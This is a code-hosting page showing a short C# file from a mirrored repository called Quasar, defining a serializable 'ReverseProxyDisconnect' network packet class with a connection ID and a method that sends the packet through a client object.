mirror of https://github.com/quasar/Quasar.git
27 lines
531 B
C#
27 lines
531 B
C#
using System;
|
|
using xClient.Core.Networking;
|
|
using xClient.Core.Packets;
|
|
|
|
namespace xClient.Core.ReverseProxy.Packets
|
|
{
|
|
[Serializable]
|
|
public class ReverseProxyDisconnect : IPacket
|
|
{
|
|
public int ConnectionId { get; set; }
|
|
|
|
public ReverseProxyDisconnect(int connectionId)
|
|
{
|
|
this.ConnectionId = connectionId;
|
|
}
|
|
|
|
public ReverseProxyDisconnect()
|
|
{
|
|
}
|
|
|
|
public void Execute(Client client)
|
|
{
|
|
client.Send(this);
|
|
}
|
|
}
|
|
}
|